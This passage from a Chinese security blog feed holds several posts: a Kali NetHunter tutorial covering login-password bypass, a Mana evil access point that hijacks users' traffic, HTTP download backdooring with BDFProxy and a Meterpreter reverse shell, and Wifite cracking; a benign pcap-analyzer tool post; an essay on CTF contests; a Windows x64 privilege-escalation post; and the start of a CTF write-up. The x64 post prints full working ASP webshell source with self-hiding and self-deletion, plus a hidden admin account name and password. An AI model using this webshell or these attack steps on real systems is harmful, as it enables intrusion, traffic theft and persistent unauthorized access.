class="md_block"> <span class="md_line">此时在设有密码的PC机重启,进入BIOS设置启动项</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-56.jpg" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">如果镜像加载成功,可以看到飞奔的图案如下:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-57.jpg" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">之后登陆用户密码处回车即可绕过密码认证登陆系统</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-58.jpg" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">需要说明的是,通过此方式登陆系统无法直接修改或删除系统密码.</span> </p> <h4 id="toc_9">0x09 WarDriving</h4> <p class="md_block"> <span class="md_line">犹记得当年前辈们肩扛笔记本做WarDriving的事迹,智能设备发展至今,WarDriving已可用便携设备取代.只是至今迟迟没有寻觅到比较合适直观的WarDriving工具,期待有朋友能开发或推荐个.</span> </p> <p class="md_block"> <span class="md_line">在NetHunter下,Kali-Menu的Wireless模块中Kismet作为WarDriving的默认工具,不过操作起来画面太美不敢看:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-60.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">退而求其次,推荐使用App WigleWifi.不过注意不要不小心上传数据.使用easy,界面很难看.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-61.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">好在数据可以以Sqlite数据库格式存储在本地.</span> </p> <h4 id="toc_10">0x0A Mana EvilAP蜜罐</h4> <p class="md_block"> <span class="md_line">想建个CMCC无线网络钓鱼劫持流量?PineApple没有带在身边,不妨拿出手机,开个蜜罐吧. :)</span> </p> <p class="md_block"> <span class="md_line">Mana蜜罐采用与PineApple相同的:Hostapd的Karma补丁,可用来欺骗接入无线网络用户,使其可很平滑连接到虚假AP中,进行后续攻击.</span> </p> <p class="md_block"> <span class="md_line">需要说明的是,NetHunter无线攻击模块,大都需要使用OTG外接USB无线网卡.主流芯片(可以试试Kali是否可直接识别)网卡均可.WN722N较为推荐,迷你的EDUP网卡通用性则较强(Raspberry Pi也可直接识别),只是信号强度..自然可想而知.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-70.jpg" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Mana蜜罐有多种Hacking模式,均为sh脚本,可自由定制.Mana工具安装目录为:</span> </p> <pre><code>/usr/share/mana-toolkit</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">启动脚本则在此处存放:</span> </p> <pre><code>/usr/share/mana-toolkit/run-mana</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">截获流量文件存放于:</span> </p> <pre><code>/var/lib/mana-toolkit</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">通过NetHunter Home的Mana蜜罐页面可方便的对配置文件进行修改:</span> </p> <p class="md_block"> <span class="md_line">Hostapd配置文件</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-71.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">DHCP服务配置文件</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-72.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">DNS欺骗配置文件</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-73.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">服务启动脚本有多个,均可自由编辑修改:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-74.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">上图对应脚本start-nat-full.sh,脚本需要USB无线网卡(存在上行流量)启动,无线连入为NAT模式,并启动所有脚本包括:firelamb,sslstrip,sslsplit等,截获流量并保存.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-75.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">start-nat-simple.sh同样有上行流量,但并不启动firelamb,sslstrip,sslsplit等脚本.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-76.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">start-nat-simple-bdf.sh,加入了BDF恶意代码Inject工具,后面章节将对其攻击思路进行介绍.</span> </p> <p class="md_block"> <span class="md_line">此外,还有</span> </p> <p class="md_block"> <span class="md_line">start-noupstream.sh</span> </p> <pre><code>Mana作为无法上网的虚假AP启动,但可吸引WIFI默认开启的终端自动连接并抓取信息.</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">start-noupstream-eap.sh</span> </p> <pre><code>Mana同样无法上网,但会进行EAP攻击</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">编辑好启动文件后,Start Attack,会弹窗勾选启动脚本:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-77.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">即可启动服务.</span> </p> <h4 id="toc_11">0x0B Backdooring Executable Over HTTP</h4> <p class="md_block"> <span class="md_line">这个攻击思路就比较有趣了,新功能在NetHunter今年1月5号发布的版本中作为Kali Nethunter目前最新最酷炫的玩法,源于<a class="md_compiled" href="https://github.com/secretsquirrel/">secret squirrel</a>的github项目<a class="md_compiled" href="https://github.com/secretsquirrel/the-backdoor-factory">the-backdoor-factory</a>和<a class="md_compiled" href="https://github.com/secretsquirrel/BDFProxy">BDFProxy</a>,可让我们轻松地对使用HTTP协议传送的二进制文件注入shellcode.</span> </p> <p class="md_block"> <span class="md_line">首先建立一个Mana蜜罐,SSID这里使用默认名称internet,启动服务</span> </p> <pre><code>cd /usr/share/mana-toolkit/run-mana ./start-nat-simple-bdf.sh</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-80.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">再开一个Shell,编辑bdfproxy.cfg,此配置文件包含了针对不同平台默认设置的payload,可自行更换.不过由于显示问题,用nano编辑文本会一行行刷新,还是换个方式编辑比较好.这里只把IP修改192.168.1.151,也可在Nethunter的主面板下的MANA Evil Access Point中进行配置.</span> </p> <pre><code>nano /etc/bdfproxy/bdfproxy.cfg</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">配置好IP之后,在Shell中直接输入bdfproxy运行之.</span> </p> <p class="md_block"> <span class="md_line">再新开一个Shell启动Metasploit</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-81.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">一切准备就绪,等待连入蜜罐AP的PC机上网下载二进制文件,在此通过百度下载everything(神器啊)演示:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-82.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">运行everthing,因为注入了payload,会出现自校验失败的提示</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-83.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">查看MSF,已成功反弹回Shell了.而上面自校验失败的提示就是MeterPreter的screenshot帮我截取的 :)</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-84.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">不得不说,这个新特性真的很Cool.</span> </p> <h4 id="toc_12">0x0C Wifite破解</h4> <p class="md_block"> <span class="md_line">写到最后,还没有提到无线破解是不科学的;) NetHunter推荐的Wifite破解工具是其最早集成的功能之一.移动设备的便携性更有利于随时随地进行Wifi安全测试,只需挂载上外置无线网卡便可轻松抓包破解.不过并不建议直接在移动设备上破解抓到的包,如跑几分钟没结果,就拿高性能设备破解吧,否则易导致设备死机.</span> </p> <p class="md_block"> <span class="md_line">连接好外置无线网卡后,在Nethunter主菜单选择Launch Wifite即可进入</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-90.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">选择开启混杂监听模式的网卡,选择Wlan1</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-91.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">扫描开始,每5秒更新一次,当确认攻击目标后CTRL+C停止扫描</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-92.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">输入攻击目标序号,这里就选<code>XDSEC-WIFI</code>了,输入2</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-93.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">抓包成功后自动调用字典破解,这里机智的把字典删掉,其自动退出</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-94.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">抓到的握手包存放在/data/local/kali-armhf/HS目录下,命名规则是SSID+MAC</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-95.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">如果目标开启WPS,则自动进行PIN码破解.</span> </p> <p class="md_block"> <span class="md_line">Wifite相对傻瓜化,易操作,适合移动终端.对无线网密码测试笔者也成功过几次,连入无线后结合zANTI等工具调戏即可:)</span> </p> <h4 id="toc_13">0x0D 写在最后</h4> <p class="md_block"> <span class="md_line">文末,已将NetHunter大部分实战玩法进行相应介绍,文章为卷毛zing同学与顺毛le4f同学共同编写,能力有限,如有不足之处望指出.抛砖引玉,期待有更多技巧分享.</span> </p> 在线数据包分析实现 - Online Pcap Analyzer 2015-01-11T16:00:00Z post/pcap-online-analyzer Sword Soul <h4 id="toc_0">0x00 前言</h4> <p class="md_block"> <span class="md_line">不觉间2015已经来了,许久没有更新文章,不知还有几位关注的访客 :(</span> </p> <p class="md_block"> <span class="md_line">新年新文章还没出炉,先分享个刚写的工具:Pcap-Analyzer,在线轻量Pcap流量文件分析工具,有需求的朋友可以参考修改.</span> </p> <p class="md_block"> <span class="md_line">项目地址: <a class="md_compiled" href="https://github.com/le4f/pcap-analyzer">https://github.com/le4f/pcap-analyzer</a></span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">以下几个参考用途:</span> </p> <ul> <li class="md_li"> 某些数据包分析取证,自然比不上Wireshark,但部分功能较WireShark更直观 </li> <li class="md_li"> 可以考虑加入无线数据包解密分析模块 </li> <li class="md_li"> 加入用户管理模块,移动终端可上传分析抓取的数据包(MITM等) </li> </ul> <h4 id="toc_1">0x01 特点</h4> <ul> <li class="md_li"> 轻量,易读.但不适合大数据包分析.(可以基于此改进) </li> <li class="md_li"> 上传,存储,下载基本功能 </li> <li class="md_li"> 数据包分析 <ul> <li class="md_li"> 数据包列表 </li> <li class="md_li"> 数据包细节查询 </li> <li class="md_li"> Filter过滤 </li> <li class="md_li"> 数据包分析(来源/目的:IP/端口) </li> <li class="md_li"> Web请求提取 </li> <li class="md_li"> DNS请求提取 </li> <li class="md_li"> Mail流量提取 </li> </ul> </li> </ul> <h4 id="toc_2">0x02 目录结构</h4> <pre><code>. ├── app.py(运行Server) ├── img(ScreenShot) ├── server │ ├── __init__.py(Core) │ ├── func.py(调用函数) │ ├── views.py(视图) │ ├── pcapfile(上传文件目录) │ ├── db(数据库) │ ├── static(静态文件) │ └── templates(模板) ├── readme.md(项目说明) └── requirements.txt(python库依赖)</code></pre> <!--block_code_end--> <h4 id="toc_3">0x03 安装运行</h4> <ul> <li class="md_li"><code>$ git clone https://github.com/le4f/pcap-analyzer.git</code> </li> <li class="md_li"><code>$ cd pcap-analyzer</code> </li> <li class="md_li"><code>$ pip install -r requirements.txt</code> </li> <li class="md_li"><code>$ python app.py</code> </li> <li class="md_li"><code>View http://localhost:8080/</code> </li> </ul> <h4 id="toc_4">0x04 运行截图</h4> <blockquote> <p class="md_block"> <span class="md_line"> 上传界面</span> </p> </blockquote> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-01.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> 分析界面</span> </p> </blockquote> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-02.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> 过滤器</span> </p> </blockquote> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-03.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> 数据包细节</span> </p> </blockquote> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-04.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> 数据包概况(来源/目的:IP/Port)</span> </p> </blockquote> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-05.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> Web请求</span> </p> </blockquote> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-06.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> DNS请求</span> </p> </blockquote> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-07.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> Mail流量</span> </p> </blockquote> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-08.png" alt="img" title="" ></span> </p> <h4 id="toc_5">0x05 代码依赖</h4> <ul> <li class="md_li"> <a class="md_compiled" href="http://flask.pocoo.org">Flask</a> </li> <li class="md_li"> <a class="md_compiled" href="http://semantic-ui.com">Semanstic-UI</a> </li> <li class="md_li"> <a class="md_compiled" href="http://jquery.com/">JQuery</a> </li> <li class="md_li"> <a class="md_compiled" href="http://kiminewt.github.io/pyshark/">PyShark</a> </li> <li class="md_li"> <a class="md_compiled" href="https://github.com/mher/chartkick.py">Chartkick</a> </li> <li class="md_li"> <a class="md_compiled" href="http://api.highcharts.com/highcharts">Highcharts</a> </li> </ul> <blockquote> <p class="md_block"> <span class="md_line"> 感谢以下项目作为参考</span> </p> </blockquote> <ul> <li class="md_li"> <a class="md_compiled" href="https://github.com/thepacketgeek/cloud-pcap">Cloud-Pcap</a> </li> <li class="md_li"> <a class="md_compiled" href="https://github.com/madpowah/ForensicPCAP">ForensicPcap</a> </li> </ul> <h4 id="toc_6">0x06 小结</h4> <p class="md_block"> <span class="md_line">Pcap-Analyzer暂时并不适合分析大流量数据包(耗时较久),不适合直接投放生产环境中(并不安全).</span> </p> <p class="md_block"> <span class="md_line">旨在代码分享,如有问题或思路欢迎与我联系.</span> </p> 关于CTF的一些感想 - About Capture The Flag 2014-11-09T16:00:00Z essay/about-ctf Sword Soul <p class="md_block"> <span class="md_line">之前好伙伴写的<a class="md_compiled" href="http://z1ng.net/post/pieces/ctfde-xie-gan-xiang">CTF的一些感想</a>,我也来一篇,以此纪念玩耍CTF的这几年</span> </p> <p class="md_block"> <span class="md_line">11年,刚高中毕业的年纪,经Tm3y的介绍,玩了ISCC2011的破解关,<a class="md_compiled" href="/post/writeup/-ctf-iscc2011-qual-writeup">WriteUp可以戳我</a>,也是我第一次知道这种HackGame的存在,一步步解题的过程中也学到了并认可了自己所学的知识.不得不说,ISCC在科普上影响了很多人.</span> </p> <p class="md_block"> <span class="md_line">到了西电,在XDSEC见识了第二届西电网络攻防大赛,认识了很多朋友,也领悟人外有人,各有所长的道理.那时西北零星有些公司举行比赛欲推行系统/硬件/实验平台等,由此也与ly同学一起打了几次比赛,在西北区能玩这种Game的同学本也不多,就幸运的一边拿冠军一遍学知识.比赛还多以传统的小题目+渗透实战的形式,偶尔看到Syclover出的题目,也为此求证过CasperKid,但比赛总也能收获很多乐趣.</span> </p> <p class="md_block"> <span class="md_line">12年,开始负责西电比赛具体环境,那年认识的决赛成员现都已经工作了,除了Light 4 Freedom那个可爱的em;-)</span> </p> <p class="md_block"> <span class="md_line">13年,将网络攻防大赛XDCSC更名到XDCTF,那时候,国内还没有用CTF定义攻防比赛.只是决赛的实战环境设置虽够复杂却不甚合理,但也明确了XDCTF的特色--网络攻防实战,共同进步.而CTF的名字,随着Blue-Lotus的推动,国内已经开始满大街跑,各类组织,学校,公司都搞CTF,也隐隐发觉到又一个ACM时代的到来.</span> </p> <p class="md_block"> <span class="md_line">14年,组织的L队伍开始对CTFTime的尝试,几次比赛淋漓尽致的通宵玩两天,也是难忘的经验.也曾意图在14年XDCTF推行国内的另类CTFTime,之后巧合或是必然的,了解到诸葛老师正筹备XCTF联赛,形式模仿国外的CTFTime,只是对XCTF联赛下的比赛有了更强控制力,如此便有了联赛决赛.而我们的计划也因种种原因Cancel.</span> </p> <p class="md_block"> <span class="md_line">在近四年时间,我对CTF的看法也反复无常.意图推行实战的CTF模式,但终究明白,无论怎样模拟实战,总会缺少实战中众多元素,包括参赛人员的潜意识--只能尽可能将环境设置贴近实战.中间也曾为各种无营养题目吐槽过,也曾体会heige的想法:玩比赛干嘛,术业有专攻,而比赛却不是,打的成绩不好还容易被鄙视.</span> </p> <p class="md_block"> <span class="md_line">于是,我更愿将CTF视作娱乐性,拓宽视野的HackGame.只是国内大环境显然不会这样纯朴,与利益相关的CTF本质也是没错的:玩的好,名利双收,玩的挫,则知何处不如人.但利益大了,冲突就多了.AliCTF线上赛Check时间已然超过竞赛时间,恐怕也是受决赛丰厚奖金影响.尽管我一直对取证,电话Check这种模式感觉是对CTF本身的侮辱,是屈服于现实的无奈,但现实就是这么让人无奈:(</span> </p> <p class="md_block"> <span class="md_line">正巧这两天L队伍刚吸纳的年轻成员参加了XCTF联赛HCTF,小伙子很有精力,凌晨四点解出一道题目,一大早起来,发现L队伍账号被封号,官方表示由于相近的时间L与Wargame用类似的盲注语句拿到Flag,在IRC公告L与WarGame作弊.后小伙子主动联系官方并提供自己解题思路,官方又恢复账号,但未在IRC有公告澄清,仍需审查,同时解题思路为官方&quot;非预期漏洞&quot;,解法无效,只打赏100积分.</span> </p> <p class="md_block"> <span class="md_line">我比较懒,中午才起床听说这件事情,询问了做题的小伙子,根本不认识WarGame团队.与官方联系,要求正名,官方提出还有异议,尚需审查.下午通过其他途径了解到,WarGame团队解题人也与官方申诉,官方仍保留对我们两队的质疑.</span> </p> <p class="md_block"> <span class="md_line">现在小伙子很生气,我想,放到任何一个人身上,如果真是自己辛辛苦苦做出来的题目,不被认可判为作弊都是很大的伤害--对技术与人品,兼而有之.</span> </p> <p class="md_block"> <span class="md_line">而以我浅见,参赛队伍玩到凌晨四五点做题目,是对主办方出题的尊重,但作为主办方,以最坏的想法去看参赛成员,证据不足,仅因为太巧合了,简直没法解释,就未经实武断公告队伍作弊,在两支队伍均提出异议,且给出各自解法时,仍更愿意相信巧合没法解释,我不认为这是对参赛人员与参赛队伍的尊重.</span> </p> <p class="md_block"> <span class="md_line">而对于XCTF联赛的模式,仍有待发展,至少从我来看,现有一些规则有待改进.另外,打来打去,还是那几个赛棍,真的不烦么 @网红redrain ;-)</span> </p> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line">未来属于未来的人.也只是再憧憬下未来的XDCTF,期待更贴近实战:-)</span> </p> <blockquote> <p class="md_block"> <span class="md_line"> XDCTF --- 网络攻防,共同成长.</span> </p> </blockquote> <pre><code>感谢四年来,来XDCTF参赛的伙伴们.</code></pre> <!--block_code_end--> Windows x64下提权Exploit整理 - Windows x64 Local Privilege Escalation 2014-10-26T16:00:00Z post/windows-x64-local-privilege-escalation Sword Soul <p class="md_block"> <span class="md_line">首发<a class="md_compiled" href="http://www.secpulse.com/archives/1597.html">安全脉搏</a>,未授权请勿转载.</span> </p> <h4 id="toc_0">0x00 前言</h4> <p class="md_block"> <span class="md_line">在CVE-2014-4113出来后,x64环境下的提权又是一片短暂的光明.在此漏洞披露前,PR/IIS溢出/LPK劫持等对64位版本都无效果,网上公开曾有一个Exp有效,代号为MS10048x64.</span> </p> <p class="md_block"> <span class="md_line">本文谨记录x64下可提权的Exp与测试过程.暂不考虑依赖第三方服务(如MSSQL/MYSQL)等的提权</span> </p> <pre><code>测试环境: Windows Server 2003 Enterprise x64 Edition - VL IIS 6.0</code></pre> <!--block_code_end--> <h4 id="toc_1">0x01 手写一个AspExec先</h4> <p class="md_block"> <span class="md_line">在测试提权Exp之前,假使我们已获得一个一句话后门.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">虚拟终端看到权限不足,默默的传一个cmd.exe,设置好变量后可以正常执行命令了,甩上最新的CVE-2014-4113的exp先</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">机智的发现没有任何反应,这在ms10048上也有所体现.64位exp提权与32位提权有所区别,32位下存在虚拟终端无参数提权的exp,即使传参,也是通过以下方式执行:</span> </p> <pre><code>c:\cmd.exe /c c:\exp.exe parms</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">但是x64下的几个exp则需要这样执行:</span> </p> <pre><code>c:\exp.exe c:\recycler\server.exe</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">手传大马可执行Exp,但强迫症的还是喜欢自己动手丰衣足食(亦可以称做重复造轮子XD),kyo327曾在《浅谈在webshell下执行命令》中有所提及,先奉上部分代码窥知一二:</span> </p> <pre><code>&lt;object runat=server id=shell scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"&gt;&lt;/object&gt; &lt;%if err then%&gt; &lt;object runat=server id=shell scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"&gt;&lt;/object&gt; &lt;% end if %&gt; &lt;% 'exec command Dim path,parms,method,result path=Trim(Request("path")) parms=Trim(Request("parms")) method=Trim(Request("submit")) result="" If path="" Then path="C:\WINDOWS\system32\cmd.exe" If parms="" Then parms="/c " If method="wscript.shell" Then result=shell.exec(path&amp;" "&amp;parms).stdout.readall Elseif method="shell.application" Then set newshell=createobject("shell.application") newshell.ShellExecute path,parms,"","open",0 result="Shell.application Execute OK." Elseif method="self.delete" Then file.attributes = 0 fso.deletefile(file_name) set fso = nothing End If %&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">以上为借助Wscript.shell与Shell.application两种方式执行命令,为加强一点隐蔽性,加入几行保护代码(只读,系统,隐藏):</span> </p> <pre><code>&lt;% 'hidded shell dim file_name file_name = Server.MapPath("./") &amp; Replace(Request.ServerVariables("Script_Name"),"/","\") set fso = createobject("scripting.filesystemobject") set file = fso.getfile(file_name) file.attributes = 1+2+4 %&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">最后实现效果如下:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">隐藏属性:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-04.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">左上角显示支持组件,右侧path填写执行程序路径(如上传的cmd或exp),parms填写参数(cmd执行需/c参数,exp不需要)</span> </p> <p class="md_block"> <span class="md_line">三个Button分别表示:以script.shell执行命令/以Shell.application执行命令/脚本自删除</span> </p> <p class="md_block"> <span class="md_line">简单的一个示例:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-05.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">以上代码在此处开源:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><a class="md_compiled" href="https://github.com/le4f/aspexec">https://github.com/le4f/aspexec</a></span> </p> <h4 id="toc_2">0x02 MS10048提权</h4> <p class="md_block"> <span class="md_line">MS10048的exploit分32与64两版本,漏洞存在于xxxCreateWindowEx()函数创建窗口时的本地权限提升.</span> </p> <p class="md_block"> <span class="md_line">64位环境下可以用以执行木马后门或提权,首先拿来K8Team的一个无参数添加用户,通过API添加用户,在删除或禁用net1.exe时亦可直接添加:</span> </p> <pre><code>用户名k8team$,密码k8team!@#</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">借助AspExec,可以很方便的提权,上传exp(ms10048.exe)与添加用户程序(user.exe)</span> </p> <pre><code>Path: c:\inetpub\wwwroot\ms10048.exe Parms: c:\inetpub\wwwroot\user.exe</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">注意不需要/c参数,使用wscript.shell或shell.applicatin依具体环境设置而定,以默认(wscript.shell)为例,执行后短暂的延迟:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-06.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">查看目标主机用户,添加成功</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-07.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">至于user.exe替换成别的后门也都类似的.ms10048影响x64版本主要是Windows2003,对于新版系统还是测试CVE-2014-4113吧</span> </p> <h4 id="toc_3">0x03 CVE-2014-4113提权</h4> <p class="md_block"> <span class="md_line">相较于MS10048,新的exp效果要好很多,Exp同样分32/64两个版本,同样使用user.exe添加账户测试:</span> </p> <pre><code>Path: c:\inetpub\wwwroot\64.exe Parms: c:\inetpub\wwwroot\user.exe</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">上传64.exe(exp)执行后回显如下:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-08.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">基本没有明显延迟,很顺利的添加账号</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-09.png" alt="img" title="" ></span> </p> <h4 id="toc_4">0x04 小结</h4> <p class="md_block"> <span class="md_line">以上整理仅为对实际环境模拟测试,顺便写份代码分享;)</span> </p> <p class="md_block"> <span class="md_line">如有错误或不足,还望指点.若有新的Exploit出现,笔者也会及时补充测试.</span> </p> [CTF]AliCTF-Final-2014-Writeup 2014-10-19T16:00:00Z writeup/-ctf-alictf-final-2014-writeup Sword Soul <p class="md_block"> <span class="md_line">::L Team:: <a class="md_compiled" href="http://l-team.org/">http://l-team.org</a></span> </p> <h4 id="toc_0">0x00 前言</h4> <p class="md_block"> <span class="md_line">之前AliCTF线下决赛,因之前未参加过此类GameBox攻防的CTF决赛,经验不足,在此做一小结,同为分享.</span> </p> <p class="md_block"> <span class="md_line">竞赛官网: http://www.alictf.com/</span> </p> <p class="md_block"> <span class="md_line">决赛包括两类题目,以攻防为主的GameBox(对攻模式,分析自己GameBox文件找出漏洞,攻击其他团队获取flag文件得分和防御其他团队的攻击);以解题为主的NPC题目(根据题目说明,对指定环境进行攻击测试拿Flag).</span> </p> <h4 id="toc_1">0x01 GameBox</h4> <p class="md_block"> <span class="md_line">GameBox分Bin1/Bin2与Web1/Web2,初始开放Bin1与Web1题目,每题目对应一个拥有题目运行权限账户,同时提供一个名为CTF的账户允许对所有题目文件进行修改(Patch).</span> </p> <p class="md_block"> <span class="md_line">需要注意的是,如果以CTF账户运行普通的Bin1等服务,则会引发安全隐患(可以读取其他如Bin2的Flag),决赛过程中也确有队伍因此悲剧.</span> </p> <p class="md_block"> <span class="md_line">竞赛刚开始,因为没这方面的主观意识,没想过服务会挂掉(导致Check不通过扣分),虽也很早分析出多处可让服务退出的漏洞,但只以为要取Flag,拿shell,未想过依赖打掉其他队伍服务得分.当主办方提及的时候,大部分队伍已经丢了很多分数.这是学到的这类CTF经验之一.</span> </p> <p class="md_block"> <span class="md_line">后面由于各种Payload打的比较频繁,经常服务会宕掉,不过写个守护脚本即可.Bash限制比较多,用Python实现即可.</span> </p> <p class="md_block"> <span class="md_line">对于WebCMS,首先要做的几件防护(改后台地址/密码)等,可加WAF,分析日志看官方check页面,保证能通过即可.然后再分析具体漏洞所在.</span> </p> <p class="md_block"> <span class="md_line">两天竞赛中,除却开始未发觉的服务宕掉,后面Patch及时,虽然最后Exp只拿了三个Flag,不过防守还好,丢分还算较少.</span> </p> <p class="md_block"> <span class="md_line">另外,有线网连入GameBox环境,无线网连入Wifi的情况下,因有线网有线,需添加路由表,Mac下添加方法:</span> </p> <pre><code>sudo route flush sudo route delete 0.0.0.0 sudo route add -net 0.0.0.0 172.16.1.254(无线网关) sudo route add -net 10.1.100.0/24 10.1.7.254(有线GameBox网段)</code></pre> <!--block_code_end--> <h4 